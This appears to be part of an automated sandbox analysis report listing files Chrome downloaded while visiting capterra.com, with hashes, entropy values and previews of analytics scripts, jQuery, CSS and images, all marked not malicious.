                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65450)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):179504
                                                                                                                                                                                                        Entropy (8bit):5.345294446817182
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:9wmvBwvwCmMwe57D1pTT5OFm7eTX423SDyDbGw5frPSfFse84qaIG4:rBwvwCmMwa1LOFw/KEFsb9P
                                                                                                                                                                                                        MD5:52682AD92C47BEA45244682176ECB5CF
                                                                                                                                                                                                        SHA1:C188C94AC7E3807BD092BF6FA6EA57CFCFF1C1A1
                                                                                                                                                                                                        SHA-256:8D42B881B3A64F34C1C9A6E95796155C1827CE7E0ACB8CE50D3F1E773A045F71
                                                                                                                                                                                                        SHA-512:FAE08CC3D3C8415652FE49CD0B8A89B1570D4EDEFB5819185E5B07F5ED0720E21043B1B3E04829C0D34EDF2B1DD69E9F9EDD660DDDD9B6BD8AED2C9208036BB6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://script.hotjar.com/modules.8da33a8f469c3b5ffcec.js
                                                                                                                                                                                                        Preview:/*! For license information please see modules.8da33a8f469c3b5ffcec.js.LICENSE.txt */.!function(){var e={4788:function(e,t,n){"use strict";n.d(t,{s:function(){return r}});const r=Object.freeze({IDENTIFY_USER:"identify_user",AUTOTAG_RECORDING:"autotag_recording",TAG_RECORDING:"tag_recording",HEATMAP_HELO:"heatmap_helo",RECORDING_HELO:"recording_helo",REPORT_USER_ID:"report_user_id",MUTATION:"mutation",MOUSE_CLICK:"mouse_click",INPUT_CHOICE_CHANGE:"input_choice_change",KEY_PRESS:"key_press",MOUSE_MOVE:"mouse_move",RELATIVE_MOUSE_MOVE:"relative_mouse_move",CLIPBOARD:"clipboard",PAGE_VISIBILITY:"page_visibility",SCROLL_REACH:"scroll_reach",SCROLL:"scroll",SELECT_CHANGE:"select_change",VIEWPORT_RESIZE:"viewport_resize",SCRIPT_PERFORMANCE:"script_performance",REPORT_CONTENT:"report_content",INSERTED_RULE:"inserted_rule",DELETED_RULE:"deleted_rule"})},6939:function(e,t,n){"use strict";n.d(t,{f:function(){return f},W:function(){return g}});const r=Object.freeze({LIVE:"LIVE",REVIEW_WEBAPP:"REVI
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 6697
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2666
                                                                                                                                                                                                        Entropy (8bit):7.918101578469786
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:X/WpG+AI8a7/yNe8pw52XvM7SsQkLEXifp1x/QkmgBrvOb0rV00FVF9:PWpAIxzyNB9XvM7SsQkoUpLxX4b0rVRn
                                                                                                                                                                                                        MD5:79E0F7A4501BC79DBD676680491C8929
                                                                                                                                                                                                        SHA1:DC71805109FBE8073277F31B101B20846E36DE72
                                                                                                                                                                                                        SHA-256:154F31C5883F126A4DBF6529CB2EF064DE0A0B1DF123AD063C678FBA9A89969D
                                                                                                                                                                                                        SHA-512:885C92CF605826F56C571201A9D261C679841C1F1203DE9D86A130AF674C7DC036879EB8C1983A7C8E7879B8C69A543F1787C801AE6D108491E12D2010BFE80B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:...........Y.s.:..+.w'.....B!......v.s..nF..D.H...47...O.#v....2..G...d.......q..DZ4X....w{%..K..DH...T.dH.S.....".[.......$.XT*I{.6(-F.>..P.A.^2..,.$DM6...)..._m.K'..t.H.../.[.....C.r%.{...yi.%.....L.....>..5.m..T.8.LEDw..l.....(......x....1yyL._.?.."z...,....h5c.nd..G.G/O.i.N.9.....pUy.$M....=...EL...L.#.W..AJ..'.)...S9....zG'..V.F..b..kO...i.[.wd.v"P....{.".....J.f.[..S...g..i..z}.3R,8.c......Q.t{.R+U...>.....t....V.G...1.......H.$.q.bt*.,.m.=..d..x..T.l!.....J.2...H.)....PpE...(.\.r...Do+..6...l.IKD..P.qk...s7.j.k....|K.(.Y.#...t..c.Tt..IES..:..)_"..t...5:......Jat..].e.a...S.!W+.F85.'$..(.M+|..A@}S..#.>K...n......H.....}G..KP.,6G..(miY.l|......Z.....F..M.+7"..Qx..b._..JR2..O....qt....+I..".[....7.!....d..o9.Cw..|k~.m....|....T.%.W..;..q=.l.~.....J.v.Zu..z].5.z...G}c.}.t....a......<...]k..2%..W.>..|...tv...l.s.&.b.(F.T.q:...k.&>...}....GM!...h.F.....H.5.\..J.Q.F..^.}.$....j/.X.6.!.."...Y...3YJD".M.&?Dv)z.S...DK.E.4........."..-B..&t|
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):314166
                                                                                                                                                                                                        Entropy (8bit):5.60596984487114
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:04afSAdB6si3iIll6j4zCl0ztNAJ0MDCOJfjU7iMer:daqAv6sgiI5CYZn2
                                                                                                                                                                                                        MD5:2F99190EE3BF4B1679CAC6A8845F0267
                                                                                                                                                                                                        SHA1:70D444BA5DD8066BF0C8B40696DA9662BDAECD22
                                                                                                                                                                                                        SHA-256:A88DC10EB12BF3296CEF41A493B69F3DC37F36DE4ED13F5856FEFB1EACEB4341
                                                                                                                                                                                                        SHA-512:554F7E83432E97C79D45A6B2AA7C67B3213A888F90D2B0BE58BA50AE6DD547BF64C0B213B1CCAD73572D7A0FD5C956920AEF9DE46EEC080E71D799E3AE1F65AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-M5DGBDHG2R&l=dataLayer&cx=c
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"28",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_referral_exclusion","priority":13,"vtp_includeConditions":["list","capterra\\.com"],"tag_id":111},{"function":"__ogt_ip_mark","priority":13,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":113},{"function":"__ogt_ip_mark","priority":13,"vtp_instanceOrder":1,"vtp_paramValue":"oncrawl","vtp_ruleResult":["macro",2],"tag_id":114},{"function":"__ogt_ip_mark","priority":13,"vtp_instanceOrder":2,"vtp_paramValue":"caliperbot
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12514)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):324586
                                                                                                                                                                                                        Entropy (8bit):5.598506649028242
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:aR4McSAdB6si3i6yl6j4zCl0ztNAJ01DaOJfjU7iMeb:aqMzAv6sgi6UCY+n6
                                                                                                                                                                                                        MD5:C9A43E225E19FC924C0E5494B7AD8FD4
                                                                                                                                                                                                        SHA1:CA6A72A07B70816DCE01E312A9360CDA066D2D28
                                                                                                                                                                                                        SHA-256:DCE3E133407F70D096C500B2C829A2A72F154327B50395CC0C53F29921E40FE0
                                                                                                                                                                                                        SHA-512:7C1896880A9280FA6B33B7E27503B0AC30D77F40B7BB23EE2FA5FCE396ECEAE05E9D5FE033EBD76EFD2F8350C534849F53EACD753C1BCAF16EC7EFB259278041
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":27,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_email
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 38, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4815
                                                                                                                                                                                                        Entropy (8bit):7.933954337697856
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:uVyhkKfoAmxY3ehaRkRiPnRh9Kytqj4e99YS71UJ/oka4szVQlCpuIQ:ush1QjhtpytqUyf1QokaXzVQluQ
                                                                                                                                                                                                        MD5:19BB7FA08D45613F79D4165E8A559922
                                                                                                                                                                                                        SHA1:2673CA45D7DF5DD925DC90F7EA557088EF8AB6F0
                                                                                                                                                                                                        SHA-256:6B0F6545EF360A144EAA872E3A768F013B7CAB7750869E9FDF3F25FBC3DD439C
                                                                                                                                                                                                        SHA-512:26C8DABE3A9CB7733BA9339DEC7ABB33E4F742A52381B82853547923EF42C1D85BF90601A2B4F767697154A8D8C2848C0AFC1B9D0F6ECB5070422C99D817EBA7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...&......._U....sRGB.........IDATx^.[.tT....&.HH@#..T.pk..V.RA.........J.."..[.j[.hB@Q...B.U*!..^..Wl..!.P....LI2..w.3..3.Lf.CW..~k.5.......o.C8....,......../.,.."5..K...0..3.'B...z...`@.cj.......q0....l.}..~...4.g......;.T.......mf..B&..C.d.s3..#.>Y7.d-..q7...\..#.....f....Zn..V....=.....P........w.H.....6..s`s....'....1....z..7..&.......t...-..d...8"..(.....3..@....d......L.,~.!./`.............[......@....6..x.....ew....`*.w........'.+........'.>...U.N.p..m.....!.u%...0X.....@%...G.xHE.0.|..&..03G/.......!...v#....95.......\.yA.D.....l...y.v0...........i5.....r.<......Z.\.B\..L....T.,Z.".?.(.0............c....s..z.p.O\.....@?.1...e.....g"l.L3.B...,...p.9......u+.k&.v...v .<M.bf|H.b.....=A4.....6.1{......rf/...A..(.o............4...fTP.`....u*`..):...].s...H......o=...M.-1..F..g... .6:@..w1..Dx".....y#eW.`...Z..#(+{.......a.1........_.srB....X[=^.........H..L.J..$....l.d....?;.....0V5....U.&.E..f.....;......X.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):2.459147917027245
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                        MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                        SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                        SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                        SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.......,..........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5341
                                                                                                                                                                                                        Entropy (8bit):4.9548270251118
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:npyIv40wnaWCFpdGHxYa6Ay9uuUOWxGpzjOvjmjJjFZZ2A0F:FqaWCFpk6v9ubhxknOLSJpk
                                                                                                                                                                                                        MD5:EADC6F0564EA47B435CA80E1E30FADF1
                                                                                                                                                                                                        SHA1:BC7DC371A5713C130EF1EE82C7FDD03711DAF433
                                                                                                                                                                                                        SHA-256:15832D7288B38CD446DFC53EB577EF9270324267B842C0F2644F3C3C82F5A18A
                                                                                                                                                                                                        SHA-512:A7267144D8855B43500D33D0A6D93496457C3A38708D9F9D32EDFAC586F5973694E376FA0BF59AB90D0DD2909B664E70A54E213457AF029C5A2E8B730AFE8B02
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"CookieSPAEnabled":false,"CookieSameSiteNoneEnabled":false,"CookieV2CSPEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"PRODUCTION","Version":"202403.2.0","OptanonDataJSON":"989b7b21-d05b-49b3-9b8a-3dbec459287a","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","BulkDomainCheckUrl":"https://cookies-data.onetrust.io/bannersdk/v1/domaingroupcheck","RuleSet":[{"Id":"018fce69-2342-72df-91a0-83d13548953b","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","br","sc","sd","bs","bt","bv","sg","sh","bw","sj","by","bz","sl","sn","so","ca","sr","cc","ss","cd","st","cf","sv","cg","ch","sx","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","cv","tg","cw","th","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6157), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6157
                                                                                                                                                                                                        Entropy (8bit):5.497077613817224
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R7r5VXKO+Ds32uk6REyB3i76eVrsMVWfO72/+JSnH7TEEGlqNxRxdEjvc0B:RhhKO+DsGORxefcz+JAbTEEfJEL3B
                                                                                                                                                                                                        MD5:3F65873B888D908CA56021DF8A28D02E
                                                                                                                                                                                                        SHA1:1712BA4F7F8440679741F09760CB738BD610B41B
                                                                                                                                                                                                        SHA-256:BD6100B16A7F0EBDE9434098FF7BD0287BD4F93B2C6154A73953B5DEB865E74F
                                                                                                                                                                                                        SHA-512:7C1E4FBB46E1C14AAFB87B81A6362189D13F407EC52809DFA1DE4E5AEE018ECFD68677523EC78A36A1CBC38B259AA5C67C26436B9EC36568185161232ECDE6C1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(){"use strict";var e,t,n,r,c,f,a,d,o,i,u={},b={};function s(e){var t=b[e];if(void 0!==t)return t.exports;var n=b[e]={id:e,loaded:!1,exports:{}},r=!0;try{u[e].call(n.exports,n,n.exports,s),r=!1}finally{r&&delete b[e]}return n.loaded=!0,n.exports}s.m=u,e=[],s.O=function(t,n,r,c){if(n){c=c||0;for(var f=e.length;f>0&&e[f-1][2]>c;f--)e[f]=e[f-1];e[f]=[n,r,c];return}for(var a=1/0,f=0;f<e.length;f++){for(var n=e[f][0],r=e[f][1],c=e[f][2],d=!0,o=0;o<n.length;o++)a>=c&&Object.keys(s.O).every(function(e){return s.O[e](n[o])})?n.splice(o--,1):(d=!1,c<a&&(a=c));if(d){e.splice(f--,1);var i=r();void 0!==i&&(t=i)}}return t},s.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return s.d(t,{a:t}),t},s.d=function(e,t){for(var n in t)s.o(t,n)&&!s.o(e,n)&&Object.defineProperty(e,n,{enumerable:!0,get:t[n]})},s.f={},s.e=function(e){return Promise.all(Object.keys(s.f).reduce(function(t,n){return s.f[n](e,t),t},[]))},s.u=function(e){return 6310===e?"static/chunks/
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):83029
                                                                                                                                                                                                        Entropy (8bit):5.590519538722878
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:SIqih/oDhcgNgXVqy/OyVqyDOog2asMQi2aTXwPKMYSBRguJOvtyCNRqQfMSrJbz:sX2BA1yufMSrJbVv4a
                                                                                                                                                                                                        MD5:0DC48F925BB655E39F2A3988A34A237E
                                                                                                                                                                                                        SHA1:A7444B866D09E6EEDD794C2699A8B87B36AA34A9
                                                                                                                                                                                                        SHA-256:E185D30D5B9D068962994F5B03EC2344446DCC58988F006F58D4A729967AC2F3
                                                                                                                                                                                                        SHA-512:EA4EDC18C7F4C5B797859EC7FD7073573529CCC21654A1C86294B67C3F571037301F1410053FCC447305A60660CDD627AEAC1514A9713FE5EF145C768EA3A012
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/css/4a53ebdd234c2dea.css
                                                                                                                                                                                                        Preview::root{font-size:16px;line-height:24px}*,:after,:before{box-sizing:border-box;border:0 solid transparent;outline-color:#1c6fd1}:focus-visible{outline-width:2px;outline-style:solid;outline-color:#1c6fd1;outline-offset:2px}:focus-visible.color-mode-dark{outline-color:#68c5ed}.hidden{display:none}.invisible{visibility:hidden}html{overflow-x:hidden;color:#363a41;-webkit-letter-spacing:.025em;-moz-letter-spacing:.025em;-ms-letter-spacing:.025em;letter-spacing:.025em;--global-bg-light:#fff;--global-bg-medium:#f2f8fb;--global-bg-dark:#002e47}.sb{position:relative}.sb.bkg-white{background:#fff!important;color:#000!important}.sb.bkg-white::-moz-placeholder{color:#000}.sb.bkg-white::placeholder{color:#000}.sb.txt-white{color:#fff}.sb.bkg-black{background:#000!important;color:#fff!important}.sb.bkg-black::-moz-placeholder{color:#fff}.sb.bkg-black::placeholder{color:#fff}.sb.txt-black{color:#000}.sb.bkg-primary-base{background:#1c6fd1!important;color:#fff!important}.sb.bkg-primary-base::-moz-placeh
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 500x424, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22921
                                                                                                                                                                                                        Entropy (8bit):7.960310644437045
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:f0/m3M5mhHIdokBwpaGo3DezvO9mcuLHrbn5MsUS5AW42MZqgzFGASY+mW:j35QvanoTezvO9TuLHrbn5MIZgJGCW
                                                                                                                                                                                                        MD5:0291C2C370D004FB832249D13F69B83E
                                                                                                                                                                                                        SHA1:1F0BEB059EF33B6376CE73B440C7ED7A80EB9793
                                                                                                                                                                                                        SHA-256:497D6038B37D964D27683ED7329AB057DC8823BDA55BAA5F6D6329C5F3F59717
                                                                                                                                                                                                        SHA-512:6E026B1478370A15D53DC6146BABCC6C50600A6D48A4E7B24266E09182D0DC346073D86084784CB6473720F463C4B04F9E692097A83FB4E847DF7A98B39FE6F6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................W...........................!1..23AQUq..."Rar......STb...#45Bct....Vd...%6s..$&D.Ee...................................<...........................!1R..AQ.Saq."24....b...$3BT.#r.............?...G.69.pk@.'`\.*.K.L.l...4..H...Q....P..G.R......:.y..\.{z?G.q.....Ii)B[*O....VW../.....F...Vw...gh....B.....x.....}.c}-Y.&.......!z.7.#c..|.6kZ.I....K.+....}..67...o...j..G..q<>.-v.UO...$d.Z..4..f)>..x.JM~l....j..7...gh..}......hp.......#..F+2Iv..^O....$o...j..7...gh.R...tr....k..>PW.m.....U..'.}.c}-Y.&.......2..jfl4.>Y\l.1.......F#.......k..I...U]:)..V.Z.~d..c}-Y.&.......!..4.Wb.".S.........|..KVv........W..f_|..KVv..lo..;E.D...]....../.lo..;D.67...."li....U.}..67...o...j..b.64.Wa.*.>.....j..7...gh....}+...z.ve....gh....Z..X.M.>..x..O.2....Z..M.c}-Y.,B&.J.<E^..}.c}-Y.&.......!.cO
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):314174
                                                                                                                                                                                                        Entropy (8bit):5.606027226486752
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:04afSAdB6si3iOll6j4zCl0ztNAJ0MDCOJfjU7iMei:daqAv6sgiO5CYZnz
                                                                                                                                                                                                        MD5:ED3EF80583AAF1EEE3C5174374142B2A
                                                                                                                                                                                                        SHA1:7D83B0120265996A3134BFE98A0EE5C4661BB713
                                                                                                                                                                                                        SHA-256:8790B2DD71DF7D4B5609A4204DD1EDE61E4A84083A457BB0B9C9A48CB1F1D19D
                                                                                                                                                                                                        SHA-512:BBB45666EE27BE5A17ADD9F3701950A2E745B4CAF1B39D40E1EBABCE953A996AAA431122D2941B3743EDF234127E05CACA94DDECE15CA55AB1616783E2639321
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"28",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_referral_exclusion","priority":13,"vtp_includeConditions":["list","capterra\\.com"],"tag_id":111},{"function":"__ogt_ip_mark","priority":13,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":113},{"function":"__ogt_ip_mark","priority":13,"vtp_instanceOrder":1,"vtp_paramValue":"oncrawl","vtp_ruleResult":["macro",2],"tag_id":114},{"function":"__ogt_ip_mark","priority":13,"vtp_instanceOrder":2,"vtp_paramValue":"caliperbot
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):89501
                                                                                                                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 170 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5816
                                                                                                                                                                                                        Entropy (8bit):7.948291195516615
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:kGLwJL1j7MNZrofM0QrcAPhTpVmXmDyzhf3qyaSP9KxsqbPuQoZj:0JL6NCQrXPhTbDyzFqy76uJd
                                                                                                                                                                                                        MD5:709917781B5C91BC2F2552E09DC2BCCD
                                                                                                                                                                                                        SHA1:0FD9DB8D88EA80C44CCCBDAA2627BB7949408DC1
                                                                                                                                                                                                        SHA-256:A46C926C07B88291817428C058225784C4A30688EB782A69C13E926A8A2A8FE4
                                                                                                                                                                                                        SHA-512:99EF0B28AEF2403148DC70C7BC3AD42B5EFF0E7F7D4AC662BA39ED24A783FAAB8237509ADEF41EF1DF90D7933BCB6BA4B6BBDA7F20532BA6F22B9BA44880A4AA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR..............W.L....gAMA......a....8eXIfMM.*.......i...................................................+IDATx....T...R.{..4.4."..Q.....m.ED....7..[\2C4.q..q.1.8.o.D'~2F....k...EE.0.,.v7k.4MS.U........EuwuS...}.r.9.{..+.#....j ........:...p].K*^V.....L.}.+7....?w.I&.fie5.QC-v..Z.ui}`.Y.f5.I.d.P.f.`~ny .>3.Bfie5.1C...UA.r':Q.pm{..G....j S.....T>.....0.j..otD.....j c..u.cL.*s#.a...N..UoV...@F.u.3.l#j\..e.,.ft..U9~Y.f5p(....%..rM.d.z.8xU.Ns>..u(.e.f5.k #..n..a..~:H)..0h..n`..(...8.....VUYX.d..6r..cF..n...d3Y.t]..l...g..,k..m].}..,..i.V.r._..Y.tW..l.f.q..Q.....a..m.8`;.........C3T.0#.1.5..t(7..9.%<.dCV....s.U=.a.(.........qs....q^7.V..e.O...]T.0["..~]^...F6..M..0"V.i.o.;..={..r...z'..m;.u...4<X..S.Z5....7.ao.v....5..%%%=........C{....y.<P.....9g..r...:.+0..:..e..m..Y.....,.....;..vJ..B.........G...=&..........t%.8.......&t.........?......,......u.9<^.....n.x..._D.H.srrV`..(..G?..7///RSS....1.6.D..+/8..\..x.K>FG.+5.\....aO70Q....za
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3238
                                                                                                                                                                                                        Entropy (8bit):7.825311025417012
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+cLj+OHobwTwKHBd93b3PCr7cWFf8Nhwh2I1rDl:+WK8oborHB7m30H+1rDl
                                                                                                                                                                                                        MD5:E2C7628A4E38D1F9F773FC5495BD9C00
                                                                                                                                                                                                        SHA1:BE85F7223E40ADB8271D001370B161EFE739E930
                                                                                                                                                                                                        SHA-256:9BDB8B6054EF4BD8316C6B476CA1BA76BD2A0B1A938F61037B4ACF2363D4B9A2
                                                                                                                                                                                                        SHA-512:0381DBE166DF5003A5E8C576E1778E0A173184CFDC7BEBC4CC94283D8B742D4F70D7F3826F6B955D433CBFB50040B2FA405BEEA5DBB6458A1DFF83FEED9D2BE9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
